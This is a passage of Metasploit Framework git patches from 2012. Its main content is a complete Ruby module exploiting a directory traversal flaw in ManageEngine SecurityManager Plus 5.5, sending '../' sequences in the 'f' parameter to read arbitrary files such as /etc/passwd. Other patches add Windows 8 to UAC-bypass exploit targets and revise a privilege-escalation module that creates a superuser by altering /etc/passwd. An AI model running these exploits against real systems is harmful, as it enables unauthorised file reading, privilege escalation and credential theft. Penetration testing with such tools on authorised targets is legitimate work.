/etc/passwd by accident. This closes PR #632 [Fixes #38593685] --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3ce5ff4189..0e02a311e8 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -33,7 +33,9 @@ class Metasploit3 < Msf::Post Successful exploitation results in the creation of a new superuser account. - This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap + files and truncate /etc/passwd. Note that if this module fails, you can potentially induce + a permanent DoS on the target by corrupting the /etc/passwd file. }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], From 2a202e9035b771cf8b07ad41f36209bd1e54b3d6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:23:48 -0500 Subject: [PATCH 70/74] Add OSVDB-86563 ManageEngine SecurityManager dir traversal --- .../manageengine_securitymanager_traversal.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb new file mode 100644 index 0000000000..b716be0c79 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -0,0 +1,92 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal flaw found in ManageEngine + SecurityManager Plus 5.5 or less. When handling a file download request, + the DownloadServlet class fails to properly check the 'f' parameter, which + can be abused to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86563'], + ['EDB', '22092'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 19 2012" + )) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + fname = datastore['FILE'] + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}store", + 'vars_get' => { + 'f' => "#{traverse}#{datastore['FILE']}" + } + }) + + + if res and res.code == 500 and res.body =~ /Error report/ + print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("\t1. File does not exist.") + print_error("\t2. The server does not have any patches deployed.") + print_error("\t3. Your 'DEPTH' option isn't deep enough.") + print_error("\t4. Some kind of permission issues.") + + elsif res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.securitymanager', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end \ No newline at end of file From c878b9077b3384cc03abb43bc2b4ed049a43eefa Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:25:07 -0500 Subject: [PATCH 71/74] Rename the DeviceExpert module to avoid confusion --- ...engine_traversal.rb => manageengine_deviceexpert_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{manageengine_traversal.rb => manageengine_deviceexpert_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/manageengine_traversal.rb rename to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb From 8c46c59142e895a46d620e4b6d57a8b087ac84b2 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:11:27 +0200 Subject: [PATCH 72/74] Add support to Windows 8 Verified with Windows 8 Enterprise Evaluation --- modules/post/windows/escalate/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 7921f096b6..209f7c4d78 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post vuln = false sysinfo = session.sys.config.sysinfo winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From 53c7479d70377d05a17973e1e560ec49581a6a78 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:12:47 +0200 Subject: [PATCH 73/74] Add Windows 8 support Verified with Windows 8 Enterprise Evaluation --- modules/exploits/windows/local/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index d02b18e05a..a0d30aac47 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Local # vuln = false winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From 5e873d06972279b99306b7e4563bb530a2620888 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 30 Oct 2012 12:15:01 +0100 Subject: [PATCH 74/74] adding peer information to error message --- .../scanner/http/manageengine_securitymanager_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index b716be0c79..94d7797e8e 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end